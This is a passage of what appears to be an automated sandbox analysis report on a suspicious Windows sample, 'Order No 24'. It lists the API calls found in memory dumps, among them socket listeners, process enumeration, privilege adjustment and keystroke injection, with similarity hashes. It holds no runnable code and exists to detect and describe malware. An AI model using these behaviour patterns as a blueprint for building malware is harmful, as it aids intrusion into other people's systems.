                                                                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                                                                  • API String ID: 2234035333-194228
                                                                                                                                  • Opcode ID: 536fcabbc723ae04b8afed5e0986fc00723bdd56d15b5afd6129665408c6bdbd
                                                                                                                                  • Instruction ID: 9d8a8e8e49ab33002ccdefe6dda3ed9ee2301d731b5cc3ebb08dcd2c8c000b9f
                                                                                                                                  • Opcode Fuzzy Hash: 536fcabbc723ae04b8afed5e0986fc00723bdd56d15b5afd6129665408c6bdbd
                                                                                                                                  • Instruction Fuzzy Hash: 4A01A772E582156AF72C66F8DC5AFBFB25C9B04750F141C2CFD53A20D2D5A49E0189B2
                                                                                                                                  APIs
                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009D8CA8
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009D8CB7
                                                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 009D8CD3
                                                                                                                                  • listen.WSOCK32(00000000,00000005), ref: 009D8CE2
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009D8CFC
                                                                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 009D8D10
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279440585-0
                                                                                                                                  • Opcode ID: e302c04855cdc2d18b486ebf56113aaf5c25bbf8c420d46d80ec9ca3b01f1f03
                                                                                                                                  • Instruction ID: 05fed89f2c06e2370de31233ba316a9d9311d968c7fa5ae1ce5b7d466845e3a1
                                                                                                                                  • Opcode Fuzzy Hash: e302c04855cdc2d18b486ebf56113aaf5c25bbf8c420d46d80ec9ca3b01f1f03
                                                                                                                                  • Instruction Fuzzy Hash: 2121A372600204EFCB10EFA8CD45B6EB7A9EF88714F148559F956A73D2CB70AD42CB61
                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009C6554
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 009C6564
                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 009C6583
                                                                                                                                  • __wsplitpath.LIBCMT ref: 009C65A7
                                                                                                                                  • _wcscat.LIBCMT ref: 009C65BA
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009C65F9
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1605983538-0
                                                                                                                                  • Opcode ID: c37b9ac452bb42035f03e978ae19fa4278e9829ccffc863bb5983e9f536bc87a
                                                                                                                                  • Instruction ID: badf1b2a0c68fff2935bbda99ac17583badb0f099fccaa8e63079f1a7a80a860
                                                                                                                                  • Opcode Fuzzy Hash: c37b9ac452bb42035f03e978ae19fa4278e9829ccffc863bb5983e9f536bc87a
                                                                                                                                  • Instruction Fuzzy Hash: 9D216571D00258ABDB10EBA4CD89FDDB7BCAB49300F5004A9F545E7141DB759F85CBA2
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 009DA84E
                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 009D9296
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000,00000000), ref: 009D92B9
                                                                                                                                  Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
• Opcode ID: c300bea4e2389986247adeefdff0603ca79dd75dbc43d74ef4f4d78668ffa7be
• Instruction ID: 771fa28d72070523e1680dbec2e050a728fdfbe57307ea47181d8f097940e874
• Opcode Fuzzy Hash: c300bea4e2389986247adeefdff0603ca79dd75dbc43d74ef4f4d78668ffa7be
• Instruction Fuzzy Hash: 5F41AE71600204AFDB14BB68CC82F7E77EDEF84728F148449F956AB392DA749D028B91
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 009CEB8A
• _wcscmp.LIBCMT ref: 009CEBBA
• _wcscmp.LIBCMT ref: 009CEBCF
• FindNextFileW.KERNEL32(00000000,?), ref: 009CEBE0
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 009CEC0E
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Find$File_wcscmp$CloseFirstNext
• String ID:
• API String ID: 2387731787-0
• Opcode ID: acf7a439cbbeff18d026314e561a60d0c73ad23c8e040b11a48682d577e5b948
• Instruction ID: 871bd9e65fe3259e14a0e87c76a288f6d0522bcfa891ffd89df18a948ae6999b
• Opcode Fuzzy Hash: acf7a439cbbeff18d026314e561a60d0c73ad23c8e040b11a48682d577e5b948
• Instruction Fuzzy Hash: 5B419075A046019FCB08DF68C491FA9B7E8FF89324F10455DF95A8B3A1DB31E941CB92
APIs
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: c5ad20497cd6a2e696a5a64da754b0b2b7dfc53fa74298863a61749a15a5b853
• Instruction ID: bc45ab10fddfb9ab752836a2167f6c38950a48288aae0fc26ea3264da7eff6ed
• Opcode Fuzzy Hash: c5ad20497cd6a2e696a5a64da754b0b2b7dfc53fa74298863a61749a15a5b853
• Instruction Fuzzy Hash: B5119D327042546FE7226FAADC44B6FBB9CEF84760B050429F84AD7281DF30ED0386A4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$VUUU
• API String ID: 0-1546025612
• Opcode ID: f5724729d5a52bf795f744eea8b682e295c60e778857d7ee0f2af473dc3427a1
• Instruction ID: 959dd899b483742326112b514e45fe2be009fc00e5dde4bea0682cf4dba4a18b
• Opcode Fuzzy Hash: f5724729d5a52bf795f744eea8b682e295c60e778857d7ee0f2af473dc3427a1
• Instruction Fuzzy Hash: 3492A071E0021ACBEF24DF58D9807BDB7B1BB54314F1886AAE816AB380D7759D81CF91
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,0099E014,76230AE0,0099DEF1,00A1DC38,?,?), ref: 0099E02C
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0099E03E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
• Opcode ID: 94207c3a3dd7b95829e4a21ea1a3e605c1d1ae6fa4e97c0f4e084e9d5f12bcc6
• Instruction ID: 20ddedc2f1f2797698c99358655e8380c9ae7b1221c3310d452756bd2b99d16c
• Opcode Fuzzy Hash: 94207c3a3dd7b95829e4a21ea1a3e605c1d1ae6fa4e97c0f4e084e9d5f12bcc6
• Instruction Fuzzy Hash: E1D0C771504716AFDB31DFE5EC09762BAD9BB08711F288919F495D2150FBB4D8828750
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 009C13DC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
• Opcode ID: 9e03d62d6af97c69c4c68cde6f2bc33c3257b8ae6a55a60a810457d2eab6f699
• Instruction ID: 0e34f000f68fc2de87e9f4f442c4ff19ce511cec22bc52e289b0dec536c55e78
• Opcode Fuzzy Hash: 9e03d62d6af97c69c4c68cde6f2bc33c3257b8ae6a55a60a810457d2eab6f699
• Instruction Fuzzy Hash: 2D322475A006059FCB28CF69C490E6AB7F4FF49320B11C56EE49ADB3A2E770E941CB44
APIs
  • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
• DefDlgProcW.USER32(?,?,?,?,?), ref: 0099B22F
  • Part of subcall function 0099B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0099B5A5
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Proc$LongWindow
• String ID:
• API String ID: 2749884682-0
• Opcode ID: 1bf16a31692855dc2bc7c3f1e6289f2589a65e9ef545a62b39f3052f80d53ef3
• Instruction ID: 83e1345aacf114a487886dfec89c943ba93cf3e67d80b94439f66c892c9d875b
• Opcode Fuzzy Hash: 1bf16a31692855dc2bc7c3f1e6289f2589a65e9ef545a62b39f3052f80d53ef3
• Instruction Fuzzy Hash: 10A18870118008BADF38AF6E6E99E7F395EEBEA750B10491EF511D21A5CB2D9C019372
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009D43BF,00000000), ref: 009D4FA6
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 009D4FD2
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
• Opcode ID: c82a747db85d75e45dd34bf9a615bb510e2afe3bd81f9d002227eb8f53eadf7b
• Instruction ID: a862ce0e97cf5b84e3ec3beb9150fc6d3678f85d32d3c4cade5f22c22ae36f18
• Opcode Fuzzy Hash: c82a747db85d75e45dd34bf9a615bb510e2afe3bd81f9d002227eb8f53eadf7b
• Instruction Fuzzy Hash: A041E771584209BFEB20DF98CD81FBFB7BCEB80754F10842BF205A6290DA719E4197A0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 009CE20D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009CE267
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 009CE2B4
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: b20b052a7a4707468dbe0b8f76c3f047320d9a9da0c490591c014f238ce8db61
• Instruction ID: 562d317aa0328a7fc19922901a3ec4206cf230488a560ac73c428f144a6d550d
• Opcode Fuzzy Hash: b20b052a7a4707468dbe0b8f76c3f047320d9a9da0c490591c014f238ce8db61
• Instruction Fuzzy Hash: 09213E75A00218EFCB00EFA5D885FADFBB8FF88314F0484A9E945A7351DB319906CB50
APIs
  • Part of subcall function 0099F4EA: std::exception::exception.LIBCMT ref: 0099F51E
  • Part of subcall function 0099F4EA: __CxxThrowException@8.LIBCMT ref: 0099F533
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009BB180
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009BB1AD
• GetLastError.KERNEL32 ref: 009BB1BA
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1922334811-0
                                                                                                                                  • Opcode ID: 659ee99379c8183d067d1736d340d3a6d597ae0c035ab0845caa5e04c4eb80b4
                                                                                                                                  • Instruction ID: b4daa20dd0ea285046babcf5214c19476b10762d0db0d31c11e3407d9fca9942
                                                                                                                                  • Opcode Fuzzy Hash: 659ee99379c8183d067d1736d340d3a6d597ae0c035ab0845caa5e04c4eb80b4
                                                                                                                                  • Instruction Fuzzy Hash: 4B118FB2504205AFE718DF98DD95E6BB7ADEB44720B20852EF45A97250DBB0FC428B60
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009C66AF
                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 009C66EC
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009C66F5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 33631002-0
                                                                                                                                  • Opcode ID: 73f0ab4761488ca81b1adb4ef4754f9bc6447d443c6662f1cee5d5a0ad007e73
                                                                                                                                  • Instruction ID: 10988c69fccdbdf52e9ff978f438bf1f53ba66e9a20b32fb2f00751c26c745fd
                                                                                                                                  • Opcode Fuzzy Hash: 73f0ab4761488ca81b1adb4ef4754f9bc6447d443c6662f1cee5d5a0ad007e73
                                                                                                                                  • Instruction Fuzzy Hash: C311A5B2D00228BEE710CBE8DC45FAFBBBCEB09714F004655F901E7190C2749E0587A2
                                                                                                                                  APIs
                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 009C7223
                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009C723A
                                                                                                                                  • FreeSid.ADVAPI32(?), ref: 009C724A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3429775523-0
                                                                                                                                  • Opcode ID: 06741cde133c1092169eb43fc117ecbc5d491403d963a39219f5abf45e0dc572
                                                                                                                                  • Instruction ID: 17a3399db2023cb72cb470e5c0df09b5d707c40b216617aa73d45f65f459b995
                                                                                                                                  • Opcode Fuzzy Hash: 06741cde133c1092169eb43fc117ecbc5d491403d963a39219f5abf45e0dc572
                                                                                                                                  • Instruction Fuzzy Hash: CAF01D76A0420DBFDF04DFE4DD89EEEBBBCEF08301F104469A606E2191E2709A458B10
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 009CF599
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009CF5C9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                  • Opcode ID: 3f734a59fdf6d7ea300bfb5a7fbf795e3bf698bd4ededb3c7d2df255de4c55a1
                                                                                                                                  • Instruction ID: 39a39b77b87b2eee3a9d5e9cc98696fa3d7093c5fc9b3f6b0a501b577da95f70
                                                                                                                                  • Opcode Fuzzy Hash: 3f734a59fdf6d7ea300bfb5a7fbf795e3bf698bd4ededb3c7d2df255de4c55a1
                                                                                                                                  • Instruction Fuzzy Hash: A21161726006049FDB10EF69D845B2EB7E9FF88324F04895EF9A9D7291DB34E9018B91
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,009DBE6A,?,?,00000000,?), ref: 009CCEA7
                                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,009DBE6A,?,?,00000000,?), ref: 009CCEB9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                  • Opcode ID: 3816181c7f93ef39e752d7ffc470ea5ec7336136c25b2c34ac1ffc0ee56b7a60
                                                                                                                                  • Instruction ID: 6128f325551f887e417f8e91178e90a066efd6395ee82e73e8de19d6042cb30a
                                                                                                                                  • Opcode Fuzzy Hash: 3816181c7f93ef39e752d7ffc470ea5ec7336136c25b2c34ac1ffc0ee56b7a60
                                                                                                                                  • Instruction Fuzzy Hash: 2FF0827550022DABDB10ABE4DC49FEA776DFF09351F004169F919D6181D7309A41CBA5
                                                                                                                                  APIs
                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 009C4153
                                                                                                                                  • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 009C4166
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InputSendkeybd_event
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3536248340-0
                                                                                                                                  • Opcode ID: 294f6b0b76eab17a7069e332349e6b8319321db0a0a31e4616e6e75486383bd7
                                                                                                                                  • Instruction ID: bd5d59ba95451e2493fe37810423b8edbf84839f841a73908dbdb7ee14500821
                                                                                                                                  • Opcode Fuzzy Hash: 294f6b0b76eab17a7069e332349e6b8319321db0a0a31e4616e6e75486383bd7
                                                                                                                                  • Instruction Fuzzy Hash: E1F0677190424DAFDB058FA0CC05BBE7FB4EF10309F04840AF966AA192D77996129FA0
                                                                                                                                  APIs
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009BACC0), ref: 009BAB99
                                                                                                                                  • CloseHandle.KERNEL32(?,?,009BACC0), ref: 009BABAB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 81990902-0
                                                                                                                                  • Opcode ID: 2430332a03fa0107125b616dba5f1c7112a655702cbdf09c874661722737df90
                                                                                                                                  • Instruction ID: 4dc31a2574cec4d192baa412e2df7f9ae476ff52240420d5d58602a394dd0f56
                                                                                                                                  • Opcode Fuzzy Hash: 2430332a03fa0107125b616dba5f1c7112a655702cbdf09c874661722737df90
                                                                                                                                  • Instruction Fuzzy Hash: EEE0E672000510AFEB252F94EC05D77BBEDEF44320711C529F45AC1470DB625D91DB51
                                                                                                                                  APIs
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,009A6DB3,-0000031A,?,?,00000001), ref: 009A81B1
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009A81BA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
